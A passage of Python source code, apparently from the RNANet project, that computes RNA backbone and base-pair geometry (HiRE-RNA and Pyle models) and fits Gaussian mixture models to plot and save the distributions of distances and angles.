p_o5_c5_c4 = get_torsion_angle(atom_p, atom_o5p, atom_c5p, atom_c4p)
o5_c5_c4_c1 = get_torsion_angle(atom_o5p, atom_c5p, atom_c4p, atom_c1p)
c5_c4_c1_b1 = get_torsion_angle(atom_c5p, atom_c4p, atom_c1p, atom_b1)
c4_c1_b1_b2 = get_torsion_angle(atom_c4p, atom_c1p, atom_b1, atom_b2)
o5_c5_c4_psuiv = get_torsion_angle(last_o5p, last_c5p, last_c4p, atom_p)
c5_c4_psuiv_o5suiv = get_torsion_angle(last_c5p, last_c4p, atom_p, atom_o5p)
c4_psuiv_o5suiv_c5suiv = get_torsion_angle(last_c4p, atom_p, atom_o5p, atom_c5p)
c1_c4_psuiv_o5suiv = get_torsion_angle(last_c1p, last_c4p, atom_p, atom_o5p)
last_c4p = atom_c4p
last_c5p = atom_c5p
last_c1p = atom_c1p
last_o5p = atom_o5p
l_dist.append([res.get_resname(), last_c4p_p, p_o5p, o5p_c5p, c5p_c4p, c4p_c1p, c1p_b1, b1_b2])
l_angl.append([res.get_resname(), lastc4p_p_o5p, lastc1p_lastc4p_p, lastc5p_lastc4p_p, p_o5p_c5p, o5p_c5p_c4p, c5p_c4p_c1p, c4p_c1p_b1, c1p_b1_b2])
l_tors.append([res.get_resname(), p_o5_c5_c4, o5_c5_c4_c1, c5_c4_c1_b1, c4_c1_b1_b2, o5_c5_c4_psuiv, c5_c4_psuiv_o5suiv, c4_psuiv_o5suiv_c5suiv, c1_c4_psuiv_o5suiv])
df = pd.DataFrame(l_dist, columns=["Residue", "C4'-P", "P-O5'", "O5'-C5'", "C5'-C4'", "C4'-C1'", "C1'-B1", "B1-B2"])
df.to_csv(runDir + '/results/geometry/HiRE-RNA/distances/distances_HiRERNA '+name+'.csv')
df = pd.DataFrame(l_angl, columns=["Residue", "C4'-P-O5'", "C1'-C4'-P", "C5'-C4'-P", "P-O5'-C5'", "O5'-C5'-C4'", "C5'-C4'-C1'", "C4'-C1'-B1", "C1'-B1-B2"])
df.to_csv(runDir + '/results/geometry/HiRE-RNA/angles/angles_HiRERNA ' + name + ".csv")
df=pd.DataFrame(l_tors, columns=["Residue", "P-O5'-C5'-C4'", "O5'-C5'-C4'-C1'", "C5'-C4'-C1'-B1", "C4'-C1'-B1-B2", "O5'-C5'-C4'-P°", "C5'-C4'-P°-O5'°", "C4'-P°-O5'°-C5'°", "C1'-C4'-P°-O5'°"])
df.to_csv(runDir + '/results/geometry/HiRE-RNA/torsions/torsions_HiRERNA '+name+'.csv')
@trace_unhandled_exceptions
def measures_hrna_basepairs(name, s, path_to_3D_data, thr_idx):
"""
Open a rna_only/ file, and run measures_hrna_basepairs_chain() on every chain
"""
setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measures_hrna_basepairs({name})")
l = []
chain = next(s[0].get_chains())
# do not recompute something already computed
if os.path.isfile(runDir + "/results/geometry/HiRE-RNA/basepairs/basepairs_"+name+".csv"):
return
df = pd.read_csv(os.path.abspath(path_to_3D_data +"datapoints/" + name))
# if df['index_chain'][0] == 1: # ignore files with numbering errors : TODO : remove when we get DSSR Pro, there should not be numbering errors anymore
l = measures_hrna_basepairs_chain(name, chain, df, thr_idx)
df_calc = pd.DataFrame(l, columns=["type_LW", "nt1_idx", "nt1_res", "nt2_idx", "nt2_res", "Distance",
"211_angle", "112_angle", "dB1", "dB2", "alpha1", "alpha2", "3211_torsion", "1123_torsion"])
df_calc.to_csv(runDir + "/results/geometry/HiRE-RNA/basepairs/"+'basepairs_' + name + '.csv', float_format="%.3f")
@trace_unhandled_exceptions
def measures_hrna_basepairs_chain(name, chain, df, thr_idx):
"""
Cleanup of the dataset
measurements of distances and angles between paired nucleotides in the chain
"""
results = []
warnings.simplefilter(action="ignore", category=SettingWithCopyWarning)
pairs = df[['index_chain', 'old_nt_resnum', 'paired', 'pair_type_LW']] # columns we keep
for i in range(pairs.shape[0]): # we remove the lines where no pairing (NaN in paired)
index_with_nan = pairs.index[pairs.iloc[:,2].isnull()]
pairs.drop(index_with_nan, 0, inplace=True)
paired_int = []
for i in pairs.index: # convert values from paired to integers or lists of integers
paired = pairs.at[i, 'paired']
if type(paired) is np.int64 or type(paired) is np.float64:
paired_int.append(int(paired))
else : #strings
if len(paired) < 3: # a single pairing
paired_int.append(int(paired))
else : # several pairings
paired = paired.split(',')
l = [ int(i) for i in paired ]
paired_int.append(l)
pair_type_LW_bis = []
for j in pairs.index:
pair_type_LW = pairs.at[j, 'pair_type_LW']
if len(pair_type_LW) < 4 : # a single pairing
pair_type_LW_bis.append(pair_type_LW)
else : # several pairings
pair_type_LW = pair_type_LW.split(',')
l = [ i for i in pair_type_LW ]
pair_type_LW_bis.append(pair_type_LW)
# addition of these new columns
pairs.insert(4, "paired_int", paired_int, True)
pairs.insert(5, "pair_type_LW_bis", pair_type_LW_bis, True)
indexNames = pairs[pairs['paired_int'] == 0].index
pairs.drop(indexNames, inplace=True) # deletion of lines with a 0 in paired_int (matching to another RNA chain)
for i in tqdm(pairs.index, position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measures_hrna_basepairs_chain", unit="res", leave=False):
# calculations for each row of the pairs dataset
index = pairs.at[i, 'index_chain']
res1 = chain[(' ', index, ' ')].get_resname()
if res1 not in ['A','C','G','U']:
continue
type_LW = pairs.at[i, 'pair_type_LW_bis'] # pairing type
num_paired = pairs.at[i, 'paired_int'] # number (index_chain) of the paired nucleotide
if type(num_paired) is int or type(num_paired) is np.int64:
res2 = chain[(' ', num_paired, ' ')].get_resname()
if res2 not in ["A","C","G","U"]:
continue
measures = basepair_measures(chain[(' ', index, ' ')], chain[(' ', num_paired, ' ')])
if measures is not None:
results.append([type_LW, index, res1, num_paired, res2] + measures)
else:
for j in range(len(num_paired)): # if several pairings, process them one by one
if num_paired[j] != 0:
res2 = chain[(' ', num_paired[j], ' ')].get_resname()
if res2 not in ["A","C","G","U"]:
continue
measures = basepair_measures(chain[(' ', index, ' ')], chain[(' ', num_paired[j], ' ')])
if measures is not None:
results.append([type_LW[j], index, res1, num_paired[j], res2] + measures)
return results
@trace_unhandled_exceptions
def basepair_measures(res, pair):
"""
Measurement of the flat angles describing a basepair in the HiRE-RNA model
"""
if res.get_resname()=='C' or res.get_resname()=='U' :
atom_c4_res = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
atom_c1p_res = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
atom_b1_res = pos_b1(res)
if not len(atom_c4_res) or not len(atom_c1p_res) or not len(atom_b1_res):
return
a3_res = Vector(atom_c4_res[0])
a2_res = Vector(atom_c1p_res[0])
a1_res = Vector(atom_b1_res[0])
if res.get_resname()=='A' or res.get_resname()=='G' :
atom_c1p_res = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
atom_b1_res = pos_b1(res)
atom_b2_res = pos_b2(res)
if not len(atom_c1p_res) or not len(atom_b1_res) or not len(atom_b2_res):
return
a3_res = Vector(atom_c1p_res[0])
a2_res = Vector(atom_b1_res[0])
a1_res = Vector(atom_b2_res[0])
if pair.get_resname()=='C' or pair.get_resname()=='U' :
atom_c4_pair = [ atom.get_coord() for atom in pair if "C4'" in atom.get_fullname() ]
atom_c1p_pair = [ atom.get_coord() for atom in pair if "C1'" in atom.get_fullname() ]
atom_b1_pair = pos_b1(pair)
if not len(atom_c4_pair) or not len(atom_c1p_pair) or not len(atom_b1_pair):
return
a3_pair = Vector(atom_c4_pair[0])
a2_pair = Vector(atom_c1p_pair[0])
a1_pair = Vector(atom_b1_pair[0])
if pair.get_resname()=='A' or pair.get_resname()=='G' :
atom_c1p_pair = [ atom.get_coord() for atom in pair if "C1'" in atom.get_fullname() ]
atom_b1_pair = pos_b1(pair)
atom_b2_pair = pos_b2(pair)
if not len(atom_c1p_pair) or not len(atom_b1_pair) or not len(atom_b2_pair): # No C1' atom in the paired nucleotide, skip measures.
return
a3_pair = Vector(atom_c1p_pair[0])
a2_pair = Vector(atom_b1_pair[0])
a1_pair = Vector(atom_b2_pair[0])
# Bond vectors
res_32 = a3_res - a2_res
res_12 = a1_res - a2_res
pair_32 = a3_pair - a2_pair
pair_12 = a1_pair - a2_pair
rho = a1_res - a1_pair # from pair to res
# dist
dist = rho.norm()
# we calculate the 2 plane angles
with warnings.catch_warnings():
warnings.simplefilter('ignore', RuntimeWarning)
b = res_12.angle(rho)*(180/np.pi) # equal to the previous implementation
c = pair_12.angle(-rho)*(180/np.pi) #
# Compute plane vectors
n1 = (res_32**res_12).normalized() # ** between vectors, is the cross product
n2 = (pair_32**pair_12).normalized()
# Distances between base tip and the other base's plane (orthogonal projection)
# if angle(rho, n) > pi/2 the distance is negative (signed following n)
d1 = rho*n1 # projection of rho on axis n1
d2 = rho*n2
# Now the projection of rho in the planes. It's just a sum of the triangles' two other edges.
p1 = (-rho+n1**d1).normalized() # between vector and scalar, ** is the multiplication by a scalar
p2 = (rho-n2**d2).normalized()
# Measure tau, the dihedral
u = (res_12**rho).normalized()
v = (rho**pair_12).normalized()
cosTau1 = n1*u
cosTau2 = v*n2
# cosTau is enough to compute alpha, but we can't distinguish
# yet betwwen tau and -tau. If the full computation if required, then:
tau1 = np.arccos(cosTau1)*(180/np.pi)
tau2 = np.arccos(cosTau2)*(180/np.pi)
w1 = u**n1
w2 = v**n2
if res_12*w1 < 0:
tau1 = -tau1
if pair_12*w2 < 0:
tau2 = -tau2
# And finally, the a1 and a2 angles between res_12 and p1 / pair_12 and p2
with warnings.catch_warnings():
warnings.simplefilter('ignore', RuntimeWarning)
a1 = (-res_12).angle(p1)*(180/np.pi)
a2 = (-pair_12).angle(p2)*(180/np.pi)
if cosTau1 > 0:
# CosTau > 0 (Tau < 90 or Tau > 270) implies that alpha > 180.
a1 = -a1
if cosTau2 > 0:
a2 = -a2
return [dist, b, c, d1, d2, a1, a2, tau1, tau2]
@trace_unhandled_exceptions
def GMM_histo(data_ori, name_data, scan, toric=False, hist=True, col=None, save=True) :
"""
Plot Gaussian-Mixture-Model (with or without histograms)
"""
if len(data_ori) < 30:
warn(f"We only have {len(data_ori)} observations of {name_data}, we cannot model it. Skipping.")
return
data_ori = np.array(data_ori)
if toric:
# Extend the data on the right and on the left (for angles)
data = np.concatenate([data_ori, data_ori-360.0, data_ori+360.0])
else:
data = data_ori
# chooses the number of components based on the maximum likelihood value (maxlogv)
if scan:
n_components_range = np.arange(8)+1
# aic = []
# bic = []
maxlogv=[]
md = np.array(data).reshape(-1,1)
nb_components = 1
nb_log_max = n_components_range[0]
log_max = 0
for n_comp in n_components_range:
gmm = GaussianMixture(n_components=n_comp, random_state=1234).fit(md)
# aic.append(abs(gmm.aic(md)))
# bic.append(abs(gmm.bic(md)))
maxlogv.append(gmm.lower_bound_)
if gmm.lower_bound_== max(maxlogv) : # takes the maximum
nb_components = n_comp
# if there is convergence, keep the first maximum found
if abs(gmm.lower_bound_-log_max) < 0.02 : # threshold=0.02
nb_components = nb_log_max
break
log_max = max(maxlogv)
nb_log_max = n_comp
else:
try:
nb_components = modes_data[name_data]
except KeyError:
warn(f"Unexpected key {name_data} not known in geometric_stats.py mode_data. Skipping.")
return # unexpected atom ? skip it...
if toric:
nb_components = nb_components * 2 + 1 # because we extend the xrange for toric computation. It will be restored later.
# Now compute the final GMM
obs = np.array(data).reshape(-1,1) # still on extended data
g = GaussianMixture(n_components=nb_components, random_state=1234)
g.fit(obs)
if toric:
# Now decide which to keep
keep = []
weights = []
means = []
covariances = []
sum_weights = 0.0
for m in g.means_:
keep.append(m > -180 and m <= 180)
for i, w in enumerate(g.weights_):
if not keep[i]:
continue
sum_weights += w
for i in range(nb_components):
if not keep[i]:
continue
means.append(g.means_[i])
covariances.append(g.covariances_[i])
weights.append(g.weights_[i]/sum_weights)
nb_components = len(means)
else:
weights = g.weights_
means = g.means_
covariances = g.covariances_
if nb_components == 0:
# Happens when the gaussians averages are outside [-180, 180]
# an have been eliminated. Fix: increase the number of components
# so that at least one is inside [-180,180]
warn(f"Found 0 gaussians in interval [-180,180] for the {name_data} GMM. Please retry with a higher number of gaussians. Ignoring the measure for now.", error=True)
return
# plot histograms if asked, with the appropriate number of components
if hist:
plt.hist(data_ori, color="green", edgecolor='black', linewidth=1.2, bins=50, density=True)
if toric:
plt.xlabel("Angle (Degrees)")
else:
plt.xlabel("Distance (Angströms)")
plt.ylabel("Density")
# Prepare the GMM curve with some absciss points
if toric:
x = np.linspace(-360.0,360.0,721)
else:
D = obs.ravel()
xmin = D.min()
#xmax = min(10.0, D.max())
xmax = D.max()
x = np.linspace(xmin,xmax,1000)
colors=['red', 'blue', 'gold', 'cyan', 'magenta', 'white', 'black', 'green']
# prepare the dictionary to save the parameters
summary_data = {}
summary_data["measure"] = name_data
summary_data["weights"] = []
summary_data["means"] = []
summary_data["std"] = []
# plot
curves = []
newx = None # to be defined inside the loop
for i in range(nb_components):
# store the parameters
mean = means[i]
sigma = np.sqrt(covariances[i])
weight = weights[i]
summary_data["means"].append("{:.2f}".format(float(str(mean).strip("[]"))))
summary_data["std"].append("{:.2f}".format(float(str(sigma).strip("[]"))))
summary_data["weights"].append("{:.2f}".format(float(str(weight).strip("[]"))))
# compute the right x and y data to plot
y = weight*st.norm.pdf(x, mean, sigma)
if toric:
y_mod = (((y[0]+180.0)%360.0)-180.0)
x_mod = (((x+180.0)%360.0)-180.0)
s = sorted(zip(x_mod,y_mod))
newx = []
newy = []
for k in range(0, len(s), 2):
if k == 362.0:
continue # this value is dealt with when k = 360.0
# print(k, "summing: ", s[k-int(k>360)], s[k+1-int(k>360)])
newx.append(s[k-int(k>360)][0])
if k == 360.0:
newy.append(s[k][1]+s[k+1][1]+s[k+2][1])
else:
newy.append(s[k-int(k>360)][1]+s[k+1-int(k>360)][1])
else:
newx = x
newy = y[0]
if hist:
# plot on top of the histograms
plt.plot(newx, newy, c=colors[i])
else:
# store for later summation
curves.append(np.array(newy))
if hist:
plt.title(f"Histogram of {name_data} with GMM of {nb_components} components (" + str(len(data_ori))+" values)")
if save:
plt.savefig(f"Histogram_{name_data}_{nb_components}_comps.png")
plt.close()
else:
# Plot their sum, do not save figure yet
plt.plot(newx, sum(curves), c=col, label=name_data)
plt.legend()
# Save the json
with open(runDir + "/results/geometry/json/" + name_data + ".json", 'w', encoding='utf-8') as f:
json.dump(summary_data, f, indent=4)
notify("Saved " + name_data + ".json")
@trace_unhandled_exceptions
def gmm_aa_dists(scan):
"""
Draw the figures representing the data on the measurements of distances between atoms
"""
setproctitle("GMM (all atoms, distances)")
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/all-atoms/distances/dist_atoms.csv"))
last_o3p_p = df["O3'-P"][~ np.isnan(df["O3'-P"])].values.tolist()
p_op1 = df["P-OP1"][~ np.isnan(df["P-OP1"])].values.tolist()
p_op2 = df["P-OP2"][~ np.isnan(df["P-OP2"])].values.tolist()
p_o5p = df["P-O5'"][~ np.isnan(df["P-O5'"])].values.tolist()
o5p_c5p = df["O5'-C5'"][~ np.isnan(df["O5'-C5'"])].values.tolist()
c5p_c4p = df["C5'-C4'"][~ np.isnan(df["C5'-C4'"])].values.tolist()
c4p_o4p = df["C4'-O4'"][~ np.isnan(df["C4'-O4'"])].values.tolist()
o4p_c1p = df["O4'-C1'"][~ np.isnan(df["O4'-C1'"])].values.tolist()
c1p_c2p = df["C1'-C2'"][~ np.isnan(df["C1'-C2'"])].values.tolist()
c2p_o2p = df["C2'-O2'"][~ np.isnan(df["C2'-O2'"])].values.tolist()
c2p_c3p = df["C2'-C3'"][~ np.isnan(df["C2'-C3'"])].values.tolist()
c3p_o3p = df["C3'-O3'"][~ np.isnan(df["C3'-O3'"])].values.tolist()
c4p_c3p = df["C4'-C3'"][~ np.isnan(df["C4'-C3'"])].values.tolist()
#if res = A ou G
c1p_n9 = df["C1'-N9"][~ np.isnan(df["C1'-N9"])].values.tolist()
n9_c8 = df["N9-C8"][~ np.isnan(df["N9-C8"])].values.tolist()
c8_n7 = df["C8-N7"][~ np.isnan(df["C8-N7"])].values.tolist()
n7_c5 = df["N7-C5"][~ np.isnan(df["N7-C5"])].values.tolist()
c5_c6 = df["C5-C6"][~ np.isnan(df["C5-C6"])].values.tolist()
c6_n1 = df["C6-N1"][~ np.isnan(df["C6-N1"])].values.tolist()
n1_c2 = df["N1-C2"][~ np.isnan(df["N1-C2"])].values.tolist()
c2_n3 = df["C2-N3"][~ np.isnan(df["C2-N3"])].values.tolist()
n3_c4 = df["N3-C4"][~ np.isnan(df["N3-C4"])].values.tolist()
c4_n9 = df["C4-N9"][~ np.isnan(df["C4-N9"])].values.tolist()
c4_c5 = df["C4-C5"][~ np.isnan(df["C4-C5"])].values.tolist()
#if res = G
c6_o6 = df["C6-O6"][~ np.isnan(df["C6-O6"])].values.tolist()
c2_n2 = df["C2-N2"][~ np.isnan(df["C2-N2"])].values.tolist()
#if res = A
c6_n6 = df["C6-N6"][~ np.isnan(df["C6-N6"])].values.tolist()
#if res = C ou U
c1p_n1 = df["C1'-N1"][~ np.isnan(df["C1'-N1"])].values.tolist()
n1_c6 = df["N1-C6"][~ np.isnan(df["N1-C6"])].values.tolist()
c6_c5 = df["C6-C5"][~ np.isnan(df["C6-C5"])].values.tolist()
c5_c4 = df["C5-C4"][~ np.isnan(df["C5-C4"])].values.tolist()
c4_n3 = df["C4-N3"][~ np.isnan(df["C4-N3"])].values.tolist()
n3_c2 = df["N3-C2"][~ np.isnan(df["N3-C2"])].values.tolist()
c2_n1 = df["C2-N1"][~ np.isnan(df["C2-N1"])].values.tolist()
c2_o2 = df["C2-O2"][~ np.isnan(df["C2-O2"])].values.tolist()
#if res =C
c4_n4 = df["C4-N4"][~ np.isnan(df["C4-N4"])].values.tolist()
#if res=U
c4_o4 = df["C4-O4"][~ np.isnan(df["C4-O4"])].values.tolist()
os.makedirs(runDir+"/results/figures/GMM/all-atoms/distances/commun/", exist_ok=True)
os.chdir(runDir+"/results/figures/GMM/all-atoms/distances/commun/")
# draw figures for atoms common to all nucleotides
GMM_histo(last_o3p_p, "O3'-P", scan)
GMM_histo(p_op1, "P-OP1", scan)
GMM_histo(p_op2, "P-OP2", scan)
GMM_histo(p_o5p, "P-O5'", scan)
GMM_histo(o5p_c5p, "O5'-C5'", scan)
GMM_histo(c5p_c4p, "C5'-C4'", scan)
GMM_histo(c4p_o4p, "C4'-O4'", scan)
GMM_histo(c4p_c3p, "C4'-C3'", scan)
GMM_histo(c3p_o3p, "C3'-O3'", scan)
GMM_histo(o4p_c1p, "O4'-C1'", scan)
GMM_histo(c1p_c2p, "C1'-C2'", scan)
GMM_histo(c2p_c3p, "C2'-C3'", scan)
GMM_histo(c2p_o2p, "C2'-O2'", scan)
GMM_histo(last_o3p_p, "O3'-P", scan, toric=False, hist=False, col='saddlebrown')
GMM_histo(p_op1, "P-OP1", scan, toric=False, hist=False, col='gold')
GMM_histo(p_op2, "P-OP2", scan, toric=False, hist=False, col='lightseagreen')
GMM_histo(p_o5p, "P-O5'", scan, toric=False, hist=False, col='darkturquoise')
GMM_histo(o5p_c5p, "O5'-C5'", scan, toric=False, hist=False, col='darkkhaki')
GMM_histo(c5p_c4p, "C5'-C4'", scan, toric=False, hist=False, col='indigo')
GMM_histo(c4p_o4p, "C4'-O4'", scan, toric=False, hist=False, col='maroon')
GMM_histo(c4p_c3p, "C4'-C3'", scan, toric=False, hist=False, col='burlywood')
GMM_histo(c3p_o3p, "C3'-O3'", scan, toric=False, hist=False, col='steelblue')
GMM_histo(o4p_c1p, "O4'-C1'", scan, toric=False, hist=False, col='tomato')
GMM_histo(c1p_c2p, "C1'-C2'", scan, toric=False, hist=False, col='darkolivegreen')
GMM_histo(c2p_c3p, "C2'-C3'", scan, toric=False, hist=False, col='orchid')
GMM_histo(c2p_o2p, "C2'-O2'", scan, toric=False, hist=False, col='deeppink')
axes = plt.gca()
axes.set_ylim(0, 100)
plt.xlabel("Distance (Angströms)")
plt.title("GMM of distances between common atoms ")
plt.savefig(runDir + "/results/figures/GMM/all-atoms/distances/commun/" + "GMM_distances_common_atoms.png")
plt.close()
# purines
os.makedirs(runDir+"/results/figures/GMM/all-atoms/distances/purines/", exist_ok=True)
os.chdir(runDir+"/results/figures/GMM/all-atoms/distances/purines/")
GMM_histo(c1p_n9, "C1'-N9", scan)
GMM_histo(n9_c8, "N9-C8", scan)
GMM_histo(c8_n7, "C8-N7", scan)
GMM_histo(n7_c5, "N7-C5", scan)
GMM_histo(c5_c6, "C5-C6", scan)
GMM_histo(c6_o6, "C6-O6", scan)
GMM_histo(c6_n6, "C6-N6", scan)
GMM_histo(c6_n1, "C6-N1", scan)
GMM_histo(n1_c2, "N1-C2", scan)
GMM_histo(c2_n2, "C2-N2", scan)
GMM_histo(c2_n3, "C2-N3", scan)
GMM_histo(n3_c4, "N3-C4", scan)
GMM_histo(c4_n9, "C4-N9", scan)
GMM_histo(c4_c5, "C4-C5", scan)
GMM_histo(c1p_n9, "C1'-N9", scan, hist=False, col='lightcoral')
GMM_histo(n9_c8, "N9-C8", scan, hist=False, col='gold')
GMM_histo(c8_n7, "C8-N7", scan, hist=False, col='lightseagreen')
GMM_histo(n7_c5, "N7-C5", scan, hist=False, col='saddlebrown')
GMM_histo(c5_c6, "C5-C6", scan, hist=False, col='darkturquoise')
GMM_histo(c6_o6, "C6-O6", scan, hist=False, col='darkkhaki')
GMM_histo(c6_n6, "C6-N6", scan, hist=False, col='indigo')
GMM_histo(c6_n1, "C6-N1", scan, hist=False, col='maroon')
GMM_histo(n1_c2, "N1-C2", scan, hist=False, col='burlywood')
GMM_histo(c2_n2, "C2-N2", scan, hist=False, col='steelblue')
GMM_histo(c2_n3, "C2-N3", scan, hist=False, col='tomato')
GMM_histo(n3_c4, "N3-C4", scan, hist=False, col='darkolivegreen')
GMM_histo(c4_n9, "C4-N9", scan, hist=False, col='orchid')
GMM_histo(c4_c5, "C4-C5", scan, hist=False, col='deeppink')
axes = plt.gca()
axes.set_ylim(0, 100)
plt.xlabel("Distance (Angströms)")
plt.title("GMM of distances between atoms of the purine cycles", fontsize=10)
plt.savefig(runDir+ "/results/figures/GMM/all-atoms/distances/purines/" + "GMM_distances_purine_cycles.png")
plt.close()
# pyrimidines
os.makedirs(runDir+"/results/figures/GMM/all-atoms/distances/pyrimidines/", exist_ok=True)
os.chdir(runDir+"/results/figures/GMM/all-atoms/distances/pyrimidines/")
GMM_histo(c1p_n1, "C1'-N1", scan)
GMM_histo(n1_c6, "N1-C6", scan)
GMM_histo(c6_c5, "C6-C5", scan)
GMM_histo(c5_c4, "C5-C4", scan)
GMM_histo(c4_n3, "C4-N3", scan)
GMM_histo(n3_c2, "N3-C2", scan)
GMM_histo(c2_o2, "C2-O2", scan)
GMM_histo(c2_n1, "C2-N1", scan)
GMM_histo(c4_n4, "C4-N4", scan)
GMM_histo(c4_o4, "C4-O4", scan)
GMM_histo(c1p_n1, "C1'-N1", scan, hist=False, col='lightcoral')
GMM_histo(n1_c6, "N1-C6", scan, hist=False, col='gold')
GMM_histo(c6_c5, "C6-C5", scan, hist=False, col='lightseagreen')
GMM_histo(c5_c4, "C5-C4", scan, hist=False, col='deeppink')
GMM_histo(c4_n3, "C4-N3", scan, hist=False, col='red')
GMM_histo(n3_c2, "N3-C2", scan, hist=False, col='lime')
GMM_histo(c2_o2, "C2-O2", scan, hist=False, col='indigo')
GMM_histo(c2_n1, "C2-N1", scan, hist=False, col='maroon')
GMM_histo(c4_n4, "C4-N4", scan, hist=False, col='burlywood')
GMM_histo(c4_o4, "C4-O4", scan, hist=False, col='steelblue')
axes = plt.gca()
#axes.set_xlim(1, 2)
axes.set_ylim(0, 100)
plt.xlabel("Distance (Angströms")
plt.title("GMM of distances between atoms of the pyrimidine cycles", fontsize=10)
plt.savefig(runDir + "/results/figures/GMM/all-atoms/distances/pyrimidines/" + "GMM_distances_pyrimidine_cycles.png")
plt.close()
os.chdir(runDir)
setproctitle("GMM (all atoms, distances) finished")
@trace_unhandled_exceptions
def gmm_aa_torsions(scan, res):
"""
Separates the torsion angle measurements by angle type and plots the figures representing the data
"""
setproctitle("GMM (all atoms, torsions)")
# we create lists to store the values of each angle
alpha = []
beta = []
gamma = []
delta = []
epsilon = []
zeta = []
chi = []
angles_deg = retrieve_angles(runDir + "/results/RNANet.db", res)
# we remove the null values
alpha = angles_deg.alpha.values
beta = angles_deg.beta.values
gamma = angles_deg.gamma.values
delta = angles_deg.delta.values
epsilon = angles_deg.epsilon.values
zeta = angles_deg.zeta.values
chi = angles_deg.chi.values
alpha = alpha[~np.isnan(alpha)]
beta = beta[~np.isnan(beta)]
gamma = gamma[~np.isnan(gamma)]
delta = delta[~np.isnan(delta)]
epsilon = epsilon[~np.isnan(epsilon)]
zeta = zeta[~np.isnan(zeta)]
chi = chi[~np.isnan(chi)]
os.makedirs(runDir + "/results/figures/GMM/all-atoms/torsions/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/all-atoms/torsions/")
"""
We plot the GMMs with histogram for each angle
We create the corresponding json with the means and standard deviations of each Gaussian
We draw the figure grouping the GMMs of all angles without histogram to compare them with each other
"""
GMM_histo(alpha, "Alpha", scan, toric=True)
GMM_histo(beta, "Beta", scan, toric=True)
GMM_histo(gamma, "Gamma", scan, toric=True)
GMM_histo(delta, "Delta", scan, toric=True)
GMM_histo(epsilon, "Epsilon", scan, toric=True)
GMM_histo(zeta, "Zeta", scan, toric=True)
GMM_histo(chi, "Xhi", scan, toric=True)
GMM_histo(alpha, "Alpha", scan, toric=True, hist=False, col='red')
GMM_histo(beta, "Beta", scan, toric=True, hist=False, col='firebrick')
GMM_histo(gamma, "Gamma", scan, toric=True, hist=False, col='limegreen')
GMM_histo(delta, "Delta", scan, toric=True, hist=False, col='darkslateblue')
GMM_histo(epsilon, "Epsilon", scan, toric=True, hist=False, col='goldenrod')
GMM_histo(zeta, "Zeta", scan, toric=True, hist=False, col='teal')
GMM_histo(chi, "Xhi", scan, toric=True, hist=False, col='hotpink')
plt.xlabel("Angle (Degrees)")
plt.title("GMM of torsion angles")
plt.savefig("GMM_torsions.png")
plt.close()
os.chdir(runDir)
setproctitle("GMM (all atoms, torsions) finished")
@trace_unhandled_exceptions
def gmm_pyle(scan, res):
setproctitle("GMM (Pyle model)")
# Distances
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/Pyle/distances/distances_pyle.csv"))
p_c1p = df["C1'-P"][~ np.isnan(df["C1'-P"])].values.tolist()
c1p_p = df["P-C1'"][~ np.isnan(df["P-C1'"])].values.tolist()
p_c4p = df["C4'-P"][~ np.isnan(df["C4'-P"])].values.tolist()
c4p_p = df["P-C4'"][~ np.isnan(df["P-C4'"])].values.tolist()
os.makedirs(runDir + "/results/figures/GMM/Pyle/distances/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/Pyle/distances/")
GMM_histo(p_c1p, "P-C1'", scan)
GMM_histo(c1p_p, "C1'-P", scan)
GMM_histo(p_c4p, "P-C4'", scan)
GMM_histo(c4p_p, "C4'-P", scan)
GMM_histo(p_c4p, "P-C4'", scan, toric=False, hist=False, col='gold')
GMM_histo(c4p_p, "C4'-P", scan, toric=False, hist=False, col='indigo')
GMM_histo(p_c1p, "P-C1'", scan, toric=False, hist=False, col='firebrick')
GMM_histo(c1p_p, "C1'-P", scan, toric=False, hist=False, col='seagreen')
plt.xlabel("Distance (Angströms)")
plt.title("GMM of distances (Pyle model)")
plt.savefig("GMM_distances_pyle_model.png")
plt.close()
# Flat Angles
df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/Pyle/angles/flat_angles_pyle.csv"))
p_c1p_psuiv = list(df["P-C1'-P°"][~ np.isnan(df["P-C1'-P°"])])
c1p_psuiv_c1psuiv = list(df["C1'-P°-C1'°"][~ np.isnan(df["C1'-P°-C1'°"])])
os.makedirs(runDir + "/results/figures/GMM/Pyle/angles/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/Pyle/angles/")
GMM_histo(p_c1p_psuiv, "P-C1'-P°", scan, toric=True)
GMM_histo(c1p_psuiv_c1psuiv, "C1'-P°-C1'°", scan, toric=True)
GMM_histo(p_c1p_psuiv, "P-C1'-P°", scan, toric=True, hist=False, col='firebrick')
GMM_histo(c1p_psuiv_c1psuiv, "C1'-P°-C1'°", scan, toric=True, hist=False, col='seagreen')
plt.xlabel("Angle (Degrees)")
plt.title("GMM of flat angles (Pyle model)")
plt.savefig("GMM_flat_angles_pyle_model.png")
plt.close()
# Torsion angles
eta=[]
theta=[]
eta_prime=[]
theta_prime=[]
eta_base=[]
theta_base=[]
angles_deg = retrieve_eta_theta(runDir + "/results/RNANet.db", res)
eta = angles_deg.eta.values
theta = angles_deg.theta.values
eta_prime = angles_deg.eta_prime.values
theta_prime = angles_deg.theta_prime.values
eta_base = angles_deg.eta_base.values
theta_base = angles_deg.theta_base.values
eta = eta[~np.isnan(eta)]
theta = theta[~np.isnan(theta)]
eta_prime = eta_prime[~np.isnan(eta_prime)]
theta_prime = theta_prime[~np.isnan(theta_prime)]
eta_base = eta_base[~np.isnan(eta_base)]
theta_base = theta_base[~np.isnan(theta_base)]
os.makedirs(runDir + "/results/figures/GMM/Pyle/pseudotorsions/", exist_ok=True)
os.chdir(runDir + "/results/figures/GMM/Pyle/pseudotorsions/")
GMM_histo(eta, "Eta", scan, toric=True)
GMM_histo(theta, "Theta", scan, toric=True)
GMM_histo(eta_prime, "Eta'", scan, toric=True)
GMM_histo(theta_prime, "Theta'", scan, toric=True)
GMM_histo(eta_base, "Eta''", scan, toric=True)
GMM_histo(theta_base, "Theta''", scan, toric=True)
GMM_histo(eta, "Eta", scan, toric=True, hist=False, col='mediumaquamarine')
GMM_histo(theta, "Theta", scan, toric=True, hist=False, col='darkorchid')
